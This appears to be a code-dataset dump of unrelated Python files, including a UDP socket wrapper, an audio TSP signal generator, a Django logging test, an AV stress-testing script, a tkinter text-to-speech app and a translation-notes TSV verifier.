] | permissive | cellofellow/hio | a1700f3c8abc8100926dc4fc0af87efc294f6917 | 1296d196543ad01829dcb86844dfd5881af5a038 | refs/heads/master | 2023-04-04T01:27:01.449465 | 2021-04-08T17:26:01 | 2021-04-08T17:26:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,837 | py | # -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
"""
Class to manage non blocking I/O on UDP socket.
"""
def __init__(self,
ha=None,
host='',
port=55000,
bufsize=1024,
wl=None,
bcast=False):
"""
Initialization method for instance.
ha = host address duple (host, port)
host = '' equivalant to any interface on host
port = socket port
bs = buffer size
path = path to log file directory
wl = WireLog instance ref for debug logging or over the wire tx and rx
bcast = Flag if True enables sending to broadcast addresses on socket
"""
self.ha = ha or (host, port) # ha = host address duple (host, port)
self.bs = bufsize
self.wl = wl
self.bcast = bcast
self.ss = None #server's socket needs to be opened
self.opened = False
def actualBufSizes(self):
"""
Returns duple of the the actual socket send and receive buffer size
(send, receive)
"""
if not self.ss:
return (0, 0)
return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
def open(self):
"""
Opens socket in non blocking mode.
if socket not closed properly, binding socket gets error
socket.error: (48, 'Address already in use')
"""
#create socket ss = server socket
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.bcast: # enable sending to broadcast addresses
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# make socket address reusable. doesn't seem to have an effect.
# the SO_REUSEADDR flag tells the kernel to reuse a local socket in
# TIME_WAIT state, without waiting for its natural timeout to expire.
# may want to look at SO_REUSEPORT
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
self.ss.setblocking(0) #non blocking socket
#bind to Host Address Port
try:
self.ss.bind(self.ha)
except socket.error as ex:
console.terse("socket.error = {0}\n".format(ex))
return False
self.ha = self.ss.getsockname() #get resolved ha after bind
self.opened = True
return True
def reopen(self):
"""
Idempotently open socket
"""
self.close()
return self.open()
def close(self):
"""
Closes socket and logs if any
"""
if self.ss:
self.ss.close() #close socket
self.ss = None
self.opened = False
def receive(self):
"""
Perform non blocking read on socket.
returns tuple of form (data, sa)
if no data then returns (b'',None)
but always returns a tuple with two elements
"""
try:
data, sa = self.ss.recvfrom(self.bs) # sa is source (host, port)
except socket.error as ex:
# ex.args[0] is always ex.errno for better compat
if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
return (b'', None) #receive has nothing empty string for data
else:
emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
console.profuse(emsg)
raise #re raise exception ex1
if console._verbosity >= console.Wordage.profuse: # faster to check
try:
load = data.decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data).decode("ASCII"))
cmsg = ("Server at {0}, received from {1}:\n------------\n"
"{2}\n\n".format(self.ha, sa, load))
console.profuse(cmsg)
if self.wl: # log over the wire rx
self.wl.writeRx(data, who=sa)
return (data, sa)
def send(self, data, da):
"""
Perform non blocking send on socket.
data is string in python2 and bytes in python3
da is destination address tuple (destHost, destPort)
"""
try:
result = self.ss.sendto(data, da) #result is number of bytes sent
except socket.error as ex:
emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
console.profuse(emsg)
result = 0
raise
if console._verbosity >= console.Wordage.profuse:
try:
load = data[:result].decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
"{3}\n\n".format(self.ha, result, da, load))
console.profuse(cmsg)
if self.wl:
self.wl.writeTx(data[:result], who=da)
return result
PeerUdp = SocketUdpNb # alias
| [
"smith.samuel.m@gmail.com"
] | smith.samuel.m@gmail.com |
9e632c4957701975b56b0cf5058c385bbb10f102 | a1cc4d924019b4afc952ca70686b1950d3ce9890 | /ts_ws/src/villa_sound/calibration/tsp_gen.py | a2933fb0d1d03e293d8bcb9fdb4d6f8c5ceed186 | [
"MIT"
] | permissive | dsadhvi/Robot-Says-Hello | 95f06d6a905805b64f4aaca68f5abc3156bba9f4 | 3c3884ed521d19951190b0e9b000ea7e7bf15950 | refs/heads/master | 2020-03-31T01:06:35.628243 | 2018-10-05T20:49:23 | 2018-10-05T20:49:23 | 151,767,056 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,528 | py | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def get_tsp(N, Fs, flg_ud=1, flg_eval=0):
if np.log2(N) != int(np.log2(N)):
print "TSP length must be power of 2"
return 0
elif N<512:
print "TSP length is too small"
return 0
if flg_ud != 1 and flg_ud != 0:
print "TSP up and down flag is invalied"
return 0
# TSP parameters
N_set = [512, 1024, 2048, 4096, 8192, 16384]
stretch_set = [7, 10, 12, 13, 14, 15]
if N in N_set:
stretch = float(stretch_set[N_set.index(N)])
elif N>16384:
stretch = 15.0
M = int((stretch/32.0)*float(N))
t = [float(ind)/float(Fs) for ind in range(0,N)]
tsp_spec = np.zeros(N, dtype=complex)
itsp_spec = np.zeros(N, dtype=complex)
tsp_spec[0] = 1
tsp_spec[N/2] = np.exp(float(flg_ud*2-1)*1j*float(M)*np.pi)
itsp_spec[0] = 1.0/tsp_spec[0]
itsp_spec[N/2] = 1.0/tsp_spec[N/2]
for i in np.arange(1,N/2):
tsp_spec[i] = np.exp(float(flg_ud*2-1)*1j*4*float(M)*np.pi*(float(i-1)**2)/(float(N)**2))
itsp_spec[i] = 1.0/tsp_spec[i]
tsp_spec[N-i] = np.conjugate(tsp_spec[i])
itsp_spec[N-i] = 1.0/tsp_spec[N-i]
tsp_sig = (np.fft.ifft(tsp_spec,N)).real
itsp_sig = (np.fft.ifft(itsp_spec,N)).real
# Circular shift
if flg_ud == 1:
tsp_sig = np.roll(tsp_sig, -(N/2-M))
itsp_sig = np.roll(itsp_sig, N/2-M)
elif flg_ud == 0:
tsp_sig = np.roll(tsp_sig, N/2-M)
itsp_sig = np.roll(itsp_sig, -(N/2-M))
# Evaluation
if flg_eval:
print "Evaluating TSP signal..."
imp_eval_spec = np.fft.fft(tsp_sig,N)*np.fft.fft(itsp_sig,N)
imp_eval = np.fft.ifft(imp_eval_spec,N)
imp_eval_power = 20*np.log10(np.roll(np.abs(imp_eval), N/2))
plt.figure()
plt.plot(t, tsp_sig)
plt.xlabel("Time [s]")
plt.ylabel("Amplitude")
plt.figure()
plt.plot(t, itsp_sig)
plt.xlabel("Time [s]")
plt.ylabel("Amplitude")
stft_len = 256
stft_overlap = 128
stft_win = np.hamming(stft_len)
plt.figure()
pxx, stft_freq, stft_bin, stft_t = plt.specgram(tsp_sig, NFFT=stft_len, Fs=Fs, window=stft_win, noverlap=stft_overlap)
plt.axis([0, N/Fs, 0, Fs/2])
plt.xlabel("Time [s]")
plt.ylabel("Frequency [Hz]")
plt.figure()
plt.plot(imp_eval_power)
plt.ylabel("[dB]")
#plt.show()
return (tsp_sig, itsp_sig)
| [
"tracyzhang98@gmail.com"
] | tracyzhang98@gmail.com |
4d3c277d48f00fc1623f502f3285e30fdd567644 | 355a9053a17ced7d076e6fb519c57d04eedb15cc | /logger_test/logger_test/views.py | b00bb60d1a1a8e966f7fd1646710d0082e3aeb74 | [] | no_license | prafulbagai/seynse_logger | 7bbdafcd64e7117a08020e4d1dd1095959063820 | e40999855609cd74dc2d650bb8e24192d809e9fd | refs/heads/master | 2023-05-26T22:14:49.584008 | 2020-09-09T07:49:11 | 2020-09-09T07:49:11 | 215,993,615 | 0 | 0 | null | 2023-05-22T23:55:30 | 2019-10-18T09:53:53 | Python | UTF-8 | Python | false | false | 612 | py | import seynse_logger
from django.http.response import HttpResponse
import logging
try:
from django.views import View
except ImportError:
# for django >= 1.8
from django.views.generic import View
logger = logging.getLogger('test')
class Testview(View):
def get(self, request, **kwargs):
seynse_logger.clear_global_log()
seynse_logger.set_global_logs(
{'c': {'x': object}, 'C': "something else", 'INT': 10, 'FLOAT': 9.32, 'a': "some text"})
logger.info("Just to test global logs.")
seynse_logger.clear_global_log()
return HttpResponse()
| [
"praful.bagai1991@gmail.com"
] | praful.bagai1991@gmail.com |
fcbbaec32e58baf63051f622962e9ba754e5e366 | 908655251066427f654ee33ebdf804f9f302fcc3 | /Tests/Pedestrian/Pedestrian_AS.py | 6fca7c3c2b9f432c82c945dd4a51c48690014dc8 | [] | no_license | maxiaoba/MCTSPO | be567f80f1dcf5c35ac857a1e6690e1ac599a59d | eedfccb5a94e089bd925b58f3d65eef505378bbc | refs/heads/main | 2023-07-05T02:20:16.752650 | 2021-07-06T06:04:40 | 2021-07-06T06:04:40 | 381,811,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py | import mcts.AdaptiveStressTestingActionSpace as AST_AS
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math
np.random.seed(0)
max_path_length = 50
ec = 100.0
n = 160
top_k = 10
RNG_LENGTH = 2
SEED = 0
reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False,spaces=spaces,max_path_length=max_path_length)
env = ASTEnv(interactive=True,
sample_init_state=False,
s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],
simulator=sim,
reward_function=reward_function,
)
ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
macts_params = MCTSdpw.DPWParams(max_path_length,ec,n,0.5,0.85,1.0,0.0,True,1.0e308,np.uint64(0),top_k)
stress_test_num = 2
if stress_test_num == 2:
result = AST_MCTS.stress_test2(ast,macts_params,False)
else:
result = AST_MCTS.stress_test(ast,macts_params,False)
#reward, action_seq = result.rewards[1], result.action_seqs[1]
print("setp count: ",ast.step_count)
for (i,action_seq) in enumerate(result.action_seqs):
reward, _ = ASTSim.play_sequence(ast,action_seq,sleeptime=0.0)
print("predic reward: ",result.rewards[i])
print("actual reward: ",reward)
| [
"xiaobaima@DNab421bb2.stanford.edu"
] | xiaobaima@DNab421bb2.stanford.edu |
f44a5ef509cc3d410ad21ed3d5894b8dd2dd39a1 | 3795492e4e54fa58f31d60f52b13029743ac46c5 | /texttospeech.py | 8c5784873a4053e417f9637e48cbab1e8ba9e1c4 | [] | no_license | suyogsrajput/speechrecognition | 25d285cc81b4d9a72d0d201c14fca4845bc6da41 | f74f51925e2ec55deb8d29b7ca28578588bccdef | refs/heads/main | 2023-05-14T03:04:17.596347 | 2021-06-07T09:37:59 | 2021-06-07T09:37:59 | 370,767,772 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,111 | py | #import libraries
from tkinter import *
from gtts import gTTS
from playsound import playsound
import speech_recognition as sr
import os
#Initialized window
root = Tk()
root.geometry('450x400')
root.iconbitmap('voice.ico')
root.resizable(False, False)
root.config(bg = 'slate blue')
root.title('Speech Recognition')
##heading
Label(root, text = 'Text to Speech' ,cursor="xterm", font='times 20 bold underline' , bg ='slate blue').pack()
Label(root, text ='Suyog Singh Rajput' ,cursor="xterm", font ='times 12 bold', bg = 'slate blue').pack(side = BOTTOM)
Label(root, text ='LN18BTCS1020' ,cursor="xterm", font ='times 10 bold', bg = 'slate blue').pack(side = BOTTOM)
#label
Label(root, text ='Enter Text-',cursor="xterm", font ='times 15 bold', bg ='slate blue').place(x=20,y=60)
#text variable
Msg = StringVar()
#Entry
entry_field = Entry(root,textvariable =Msg, width ='60')
entry_field.place(x=20 , y=100)
#define function
def texttospeech():
Message = entry_field.get()
speech = gTTS(text = Message)
speech.save('speech.mp3')
playsound('speech.mp3')
def Exit():
root.destroy()
os.remove('speech.mp3')
def Reset():
Msg.set("")
os.remove('speech.mp3')
def speechtotext():
root.destroy()
import speechtotext as st
st.speechtotext
def main():
root.destroy()
import main
#Button
Button(root, text = "PLAY" ,cursor="hand2", font = 'times 15 bold', command = texttospeech, bg = 'MediumOrchid1').place(x=25, y=150)
Button(root,text = 'EXIT',cursor="hand2",font = 'times 15 bold' ,relief=SUNKEN, command = Exit, bg = 'firebrick1',fg = "yellow").place(x=190 , y =150)
Button(root, text = 'RESET',cursor="hand2", font='times 15 bold', command = Reset, bg = 'MediumOrchid1').place(x=102,y=150)
Button(root, text = "Speech To Text" ,cursor="hand2", font = 'times 16 bold', command = speechtotext, bg = 'MediumOrchid1',fg = "white").place(x=25, y=200)
Button(root,text = 'Main Menu',cursor="hand2",font = 'times 15 bold' , command = main, bg = 'MediumOrchid1',fg = "white").place(x=190 , y =200)
#infinite loop to run program
root.mainloop()
| [
"37499425+suyogsrajput@users.noreply.github.com"
] | 37499425+suyogsrajput@users.noreply.github.com |
24f18f2f5ba05f52b01dba5c980b7d7789d33f9a | 2ae95f690e0ed16a730aee9544b4b8f63789a0a4 | /tsv/verify_tnTSV.py | 0d6db7fc6de50f0adf8d4c2f25a542da362e6912 | [
"MIT"
] | permissive | unfoldingWord-dev/tools | 9f147672719e9e570f9f39cf38f915a9b4c25b64 | f337286a99e11d5ceb1537bff07ee10f0d6c07ed | refs/heads/develop | 2023-08-09T15:00:16.883806 | 2023-07-31T19:43:53 | 2023-07-31T19:43:53 | 11,344,473 | 7 | 14 | NOASSERTION | 2022-12-11T08:05:58 | 2013-07-11T14:44:36 | Python | UTF-8 | Python | false | false | 28,817 | py | # -*- coding: utf-8 -*-
# Python 3 script for verifying proper format of each row in a TSV tN file.
# In a TSV file, column 9 (OccurrenceNote) corresponds to a single tN file in markdown format.
# Within that field line breaks are coded as <br>, not newline characters.
# A newline terminates the entire row.
# The script checks each row for the following:
# Wrong number of columns, should be 9 per row.
# Non-sequential chapter numbers (non-sequential verse numbers are permitted).
# Invalid verse number (0).
# ASCII, non-ASCII in each column.
# SupportReference value does not match any TA articles referenced in note.
# OccurrenceNote (column 9) values. Some of these conditions are correctable with tsv_cleanup.py.
# is blank.
# ASCII content only (likely untranslated).
# Unmatched parentheses and brackets.
# Missing space after hash mark(s).
# Double quotes enclosing the OccurrenceNote field.
# Leading spaces before markdown headers.
# Translation of links.
# A lot of these checks are done by tsv2rc.py as well.
# Globals
source_dir = r'C:\DCS\Kannada\TN'
language_code = 'kn'
source_language = 'en' # The language that the notes are translated from, usually en
ta_dir = r'C:\DCS\Telugu\te_ta.STR' # Use Target language tA if available
obs_dir = r'C:\DCS\Kannada\kn_obs\content'
suppress1 = False # Suppress warnings about text before first heading and TA page references in headings
suppress2 = False # Suppress warnings about blank headings
suppress3 = False # Suppress warnings about markdown list syntax
suppress4 = False # Suppress warnings about closed headings
suppress5 = True # Suppress warnings about invalid passage links (don't know how to validate these with TSV)
suppress6 = False # Suppress warnings about invalid OBS links
suppress7 = False # Suppress warnings about file starting with blank line
suppress9 = False # Suppress warnings about ASCII content in note.
suppress10 = False # Suppress warnings about heading levels
suppress11 = False # Suppress warnings about unbalanced parentheses
suppress12 = False # Suppress warnings about markdown syntax in 1-line notes
suppress13 = False # Suppress warnings about multiple lines in non-intro notes
suppress14 = True # Suppress warnings about mismatched SupportReference and TA page references
suppress15 = False # Suppress warning for each and every blank note (Only report number of blank notes.)
#pass_pages = ['translate-blessing', 'grammar-collectivenouns']
pass_pages = []
if language_code in {'hr','id','nag','pmy','sw','en','es-419'}: # Expect ASCII content with these languages
suppress9 = True
nChecked = 0
book = None
chapter = 0
rowno = 0
issuesfile = None
# Markdown line types
HEADING = 1
BLANKLINE = 2
TEXT = 3
LIST_ITEM = 4
ORDEREDLIST_ITEM = 5
import sys
import os
import io
import re
import tsv
listitem_re = re.compile(r'[ \t]*[\*\-][ \t]')
olistitem_re = re.compile(r'[ \t]*[0-9]+\. ')
badolistitem_re = re.compile(r'[ \t]*[0-9]+[\)]')
badheading_re = re.compile(r' +#')
class State: # State information about a single note (a single column 9 value)
def setPath(self, path ):
State.path = path
State.addRow(self, None)
State.nBlanknotes = 0
def addRow(self, locator):
# State.key = key # "<ID>.<verse>.<chapter>" only needed if referencing English notes
State.locator = locator # [ <book>, <chapter>, <verse>, <ID> ]
State.md_lineno = 0
State.headingcount = 0
State.textcount = 0
State.prevheadinglevel = 0
State.currheadinglevel = 0
State.prevlinetype = None
State.currlinetype = None
State.linetype = []
State.reported1 = False
State.reported2 = False
State.leftparens = 0
State.rightparens = 0
State.leftbrackets = 0
State.rightbrackets = 0
State.leftcurly = 0
State.rightcurly = 0
State.underscores = 0
State.ascii = True # In column 9 only
State.nerrors = 0
def addSimpleNote(self, note):
State.addLine(self, note)
State.md_lineno = 0
if State.currlinetype == BLANKLINE:
State.nBlanknotes += 1
def addLine(self, line):
State.prevlinetype = State.currlinetype
State.md_lineno += 1
if line and (line[0] == '#' or badheading_re.match(line)):
State.currlinetype = HEADING
State.headingcount += 1
State.prevheadinglevel = State.currheadinglevel
State.currheadinglevel = line.count('#', 0, 5)
State.reported2 = False
elif not line or len(line.strip()) == 0:
State.currlinetype = BLANKLINE
elif listitem_re.match(line):
State.currlinetype = LIST_ITEM
if State.prevlinetype in {HEADING,BLANKLINE}:
State.textcount += 1
elif olistitem_re.match(line) or badolistitem_re.match(line):
State.currlinetype = ORDEREDLIST_ITEM
if State.prevlinetype in {HEADING,BLANKLINE}:
State.textcount += 1
else:
State.currlinetype = TEXT
State.textcount += 1
State.linetype.append(State.currlinetype)
line = line.replace('“', '') # Disregard curly quotes when determining whether the note is translated.
line = line.replace('”', '')
line = line.replace("‘", "")
line = line.replace("’", "")
line = line.replace('…', '')
if not line.isascii():
State.ascii = False
# Resets markdown line number to indicate end of line by line checking
def closeNote(self):
State.md_lineno = 0 # impacts error message format
def countParens(self, line):
if not re.search(r'[0-9]\)', line): # right parens used in list items voids the paren matching logic for that line
State.leftparens += line.count("(")
State.rightparens += line.count(")")
State.leftbrackets += line.count("[")
State.rightbrackets += line.count("]")
State.leftcurly += line.count("{")
State.rightcurly += line.count("}")
State.underscores += line.count('_')
def reportedError(self):
State.nerrors += 1
def report1(self):
State.reported1 = True
def report2(self, report=True):
State.reported2 = report
def reportParens():
state = State()
if not suppress11 and state.leftparens != state.rightparens:
reportError("Parentheses are unbalanced (" + str(state.leftparens) + ":" + str(state.rightparens) + ")")
if state.leftbrackets != state.rightbrackets:
reportError("Left and right square brackets are unbalanced (" + str(state.leftbrackets) + ":" + str(state.rightbrackets) + ")")
if state.leftcurly != state.rightcurly:
reportError("Left and right curly braces are unbalanced (" + str(state.leftcurly) + ":" + str(state.rightcurly) + ")")
if state.underscores % 2 != 0:
reportError("Unmatched underscores")
# If issues.txt file is not already open, opens it for writing.
# First renames existing issues.txt file to issues-oldest.txt unless
# issues-oldest.txt already exists.
# Returns new file pointer.
def issuesFile():
global issuesfile
if not issuesfile:
global source_dir
path = os.path.join(source_dir, "issues.txt")
if os.path.exists(path):
bakpath = os.path.join(source_dir, "issues-oldest.txt")
if not os.path.exists(bakpath):
os.rename(path, bakpath)
else:
os.remove(path)
issuesfile = io.open(path, "tw", buffering=4096, encoding='utf-8', newline='\n')
return issuesfile
# Writes error message to stderr and to issues.txt.
# locater is the first four columns of a row
def reportError(msg, reportlocation = True):
global rowno
state = State()
shortpath = shortname(state.path)
if reportlocation:
locater = state.locator # the first four columns of a row
id = ""
if locater:
id = locater[3]
if len(id) > 8:
id = id[0:8] + "..."
if locater and len(locater) > 3:
if state.md_lineno > 0:
issue = shortpath + ": " + locater[0] + " " + locater[1] + ":" + locater[2] + " ID=(" + id + "), row " + str(rowno) + "." + str(state.md_lineno) + ": " + msg + ".\n"
else:
issue = shortpath + ": " + locater[0] + " " + locater[1] + ":" + locater[2] + " ID=(" + id + "), row " + str(rowno) + ": " + msg + ".\n"
else:
issue = shortpath + ": row " + str(rowno) + ": " + msg + ".\n"
else:
issue = shortpath + ": " + msg + "\n"
sys.stderr.write(issue)
issuesFile().write(issue)
def reportSuppression(msg):
sys.stderr.write(msg + "\n")
issuesFile().write(msg + "\n")
def reportSuppressions():
reportSuppression("")
if suppress1:
reportSuppression("Warnings about text before first heading and TA page references in headings were suppressed")
if suppress2:
reportSuppression("Warnings about blank headings were suppressed")
if suppress3:
reportSuppression("Warnings about markdown list syntax were suppressed")
if suppress4:
reportSuppression("Warnings about closed headings were suppressed")
if suppress6:
reportSuppression("Warnings about invalid OBS links were suppressed")
if suppress7:
reportSuppression("Warnings about file starting with blank line were suppressed")
if suppress9:
reportSuppression("Warnings about ASCII content in column 9 were suppressed")
if suppress10:
reportSuppression("Warnings about heading levels were suppressed")
if suppress11:
reportSuppression("Warnings about unbalanced parentheses were suppressed")
if suppress12:
reportSuppression("Warnings about markdown syntax in 1-line notes were suppressed")
if suppress13:
reportSuppression("Warnings about multiple lines in non-intro notes were suppressed")
if suppress14:
reportSuppression("Warnings about mismatched SupportReference and TA page references were suppressed")
if len(pass_pages) > 0:
reportSuppression("Certain TA page names were not checked for validity. See pass_pages in code.")
# This function, instead of takeSplit(), checks simple verse notes.
# Most notes consist of a single line with no headings or lists.
def checkSimpleNote(note):
state = State()
state.countParens(note)
state.addSimpleNote(note)
if state.currlinetype in {HEADING, LIST_ITEM, ORDEREDLIST_ITEM} and not suppress12:
reportError("Simple (1-line) note starts with markdown heading or list item")
elif state.currlinetype == BLANKLINE and not suppress15:
reportError("Blank note")
if note.find("<!--") != -1 or note.find(" ") != -1 or note.find("<b>") != -1 or note.find("<span") != -1:
reportError("html code in simple note")
blankheading_re = re.compile(r'#+$')
heading_re = re.compile(r'#+[ \t]')
closedHeading_re = re.compile(r'#+[ \t].*#+[ \t]*$', re.UNICODE)
badclosedHeading_re = re.compile(r'#+[ \t].*[^# \t]#+[ \t]*$', re.UNICODE) # closing hash without preceding space
hashmiddle_re = re.compile(r'[^#]+#') # Hash marks in the middle of the line
toobold_re = re.compile(r'#+[ \t]+[\*_]', re.UNICODE) # unwanted formatting in headings
headjam_re = re.compile(r'#[^# ]', re.UNICODE) # no space after hash mark
# Processes a "line", which is part of all of a complex note.
def takeSplit(line):
state = State()
state.countParens(line)
state.addLine(line)
if not line:
if state.md_lineno == 1 and not suppress7:
reportError("starts with blank line")
return
# if state.prevlinetype == HEADING and state.currlinetype != BLANKLINE and state.currlinetype != HEADING:
# reportError("missing line break after heading")
if state.currlinetype != HEADING:
if state.headingcount == 0 and not suppress1 and not state.reported1:
reportError("has text before first heading")
state.report1()
# if state.currlinetype == TEXT and not state.reported2:
# if state.md_lineno >= 5 and state.prevlinetype == BLANKLINE and state.linetype[state.md_lineno-3] in {TEXT,LIST_ITEM,ORDEREDLIST_ITEM}:
# reportError("should be a header here, or there is some other formatting problem")
# state.report2()
if state.currlinetype == HEADING:
if state.md_lineno > 1 and state.prevlinetype != BLANKLINE and state.prevlinetype != HEADING:
reportError("missing blank line before heading")
if badheading_re.match(line):
reportError("space(s) before heading")
elif closedHeading_re.match(line):
if not suppress4:
reportError("closed heading")
if badclosedHeading_re.match(line):
reportError("no space before closing hash mark")
elif hashmiddle_re.search(line):
reportError("Hash marks in the middle of a line in note")
elif not suppress2 and blankheading_re.match(line):
reportError("blank heading")
elif len(line) > 1 and not heading_re.match(line):
reportError("missing space after hash symbol(s)")
if not suppress10:
if state.currheadinglevel > state.prevheadinglevel + 1:
if state.prevheadinglevel > 0:
reportError("heading level incremented by more than one level")
if state.currlinetype == LIST_ITEM and not suppress3:
if state.prevlinetype in { TEXT, HEADING }:
reportError("invalid list syntax; missing blank line before first list item: " + line[0:7] + "...")
i = state.md_lineno - 1
if i > 1 and state.linetype[i-1] == BLANKLINE and state.linetype[i-2] == LIST_ITEM:
reportError("invalid list style: blank line between list items")
if state.currlinetype == ORDEREDLIST_ITEM and not suppress3:
if badolistitem_re.match(line):
reportError("item number not followed by period")
if olistitem_re.match(line):
if state.prevlinetype in { TEXT, HEADING }:
reportError("missing blank line before ordered list: " + line[0:7] + "...")
i = state.md_lineno - 1
if i > 1 and state.linetype[i-1] == BLANKLINE and state.linetype[i-2] == ORDEREDLIST_ITEM:
reportError("blank line between ordered list items")
if line.find('# #') != -1:
reportError('Heading syntax error: # #')
if headjam_re.search(line):
reportError("Missing space after hash mark(s)")
if len(line) > 2 and line[0:2] == '% ':
reportError("% used to mark a heading")
if line.find("<!--") != -1 or line.find(" ") != -1 or line.find("o:p") != -1 or line.find("<span") != -1:
reportError("html code")
# Looks for :en: and rc://en in the line
def checkUnconvertedLinks(line):
if line.find('figs_') >= 0:
reportError("Underscore in tA reference")
if language_code != 'en':
if line.find(':en:') >= 0 or line.find('rc://en/') >= 0:
reportError("Unconverted language code")
# notelink_re = re.compile(r'(rc://)([\*\w\-]+)(/tn/help/)(\w\w\w/\d+/\d+)(.*)', flags=re.UNICODE)
obsJpg_re = re.compile(r'https://cdn.door43.org/obs/jpg/360px/obs-en-[0-9]+\-[0-9]+\.jpg$', re.UNICODE)
reversedlink_re = re.compile(r'\(.*\) *\[.*\]', flags=re.UNICODE)
# Check for quadruple asterisks and mismatched asterisks.
# Also checks for mismatched double underscores.
def checkAsterisks(note):
#if '****' in note:
#reportError("Note contains quadruple asterisks, ****")
#elif '**' in note:
if '**' in note:
if note.count("**") % 2 == 1:
reportError("Note seems to have mismatched '**'")
#if note.find("** ") == note.find("**"): # the first ** is followed by a space
#reportError("Incorrect markdown syntax, space after double asterisk '** '")
if note.count("__") % 2 == 1:
reportError("Note seems to have mismatched '__'")
# Compares specified page name to a list of page namss that are not to be checked.
def passpage(manpage):
passthispage = False
for name in pass_pages:
if manpage.endswith(name):
passthispage = True
break
return passthispage
tapage_re = re.compile(r'\[\[.*?/ta/man/(.*?)]](.*)', flags=re.UNICODE)
talink_re = re.compile(r'(\(rc://[\*\w\-]+/ta/man/)(.+?/.+?)(\).*)', flags=re.UNICODE)
# Parse tA manual page names from the line.
# Verifies the existence of the referenced page.
def checkTALinks(line):
found = False
page = tapage_re.search(line)
while page:
found = True
if line and line[0] == '#' and not suppress1:
reportError("tA page reference in heading")
manpage = page.group(1)
if not passpage(manpage):
path = os.path.join(ta_dir, manpage)
if not os.path.isdir(path):
reportError("invalid tA page reference: " + manpage)
page = tapage_re.search(page.group(2))
if not found: # means there were no normal looking /ta/man/ page references in the line
link = talink_re.search(line)
while link:
found = True
if line and line[0] == '#':
reportError("tA link in heading")
manpage = link.group(2)
manpage = manpage.replace('_', '-')
path = os.path.join(ta_dir, manpage)
if path[-3:].lower() == '.md':
path = path[:-3]
if not os.path.isdir(path):
reportError("invalid tA link: " + manpage)
link = talink_re.search(link.group(3))
return found
# Verify tA links, note links, OBS links and passage links.
def checkLinks(line):
checkUnconvertedLinks(line)
foundTA = checkTALinks(line)
foundOBS = checkOBSLinks(line)
# if not foundOBS: # because note links match OBS links
# foundTN = checkNoteLinks(line)
if not foundTA and not foundOBS: # and not foundTN: # because passagelink_re could match any of these
if not suppress5:
checkPassageLinks(line)
checkMdLinks(line)
checkReversedLinks(line)
mdlink_re = re.compile(r'\( *([^\(]+\. ?md)', flags=re.UNICODE) # apparent md file link following a left paren
mdnamelink_re = re.compile(r'(..)\.md', flags=re.UNICODE)
# Check for links that are corrupted, either by translating the digits or dropping the leading 0.
def checkMdLinks(line):
savline = line
link = mdlink_re.search(line)
while link:
chars = link.group(1)
if ' ' in chars or not chars.isascii():
reportError("Corrupted md file link: (" + chars)
line = line[link.end():]
link = mdlink_re.search(line)
line = savline
mdnamelink = mdnamelink_re.search(line)
while mdnamelink:
digits = mdnamelink.group(1)
if digits[0] not in '0123456789/.' or digits[1] not in '0123456789':
reportError("Corrupted md filename link: " + digits + ".md")
line = line[mdnamelink.end():]
mdnamelink = mdnamelink_re.search(line)
obslink_re = re.compile(r'(rc://)([\*\w\-]+)(/tn/help/obs/)(\d+)(/\d+)(.*)', flags=re.UNICODE)
# Returns True if any OBS links were found and checked.
def checkOBSLinks(line):
found = False
link = obslink_re.search(line)
while link:
found = True
if link.group(2) != language_code:
reportError("invalid language code in OBS link")
elif not suppress6:
obsPath = os.path.join(obs_dir, link.group(4)) + ".md"
if not os.path.isfile(obsPath):
reportError("invalid OBS link: " + link.group(1) + link.group(2) + link.group(3) + link.group(4) + link.group(5))
link = obslink_re.search(link.group(6))
return found
# Returns True if any notes links were found.
# Note links currently are not rendered on live site as links.
#def checkNoteLinks(line):
# found = False
# notelink = notelink_re.search(line)
# while notelink:
# found = True
# if notelink.group(2) != language_code:
# reportError("invalid language code in note link")
# else:
# notePath = os.path.join(tn_dir, notelink.group(4)) + ".md"
# notePath = os.path.normcase(notePath)
# if not os.path.isfile(notePath):
# reportError("invalid note link: " + notelink.group(1) + notelink.group(2) + notelink.group(3) + notelink.group(4))
# notelink = notelink_re.search(notelink.group(5))
#
# if notelink:
# found = True
# return found
passagelink_re = re.compile(r'] ?\(([^\)]*?)\)(.*)', flags=re.UNICODE)
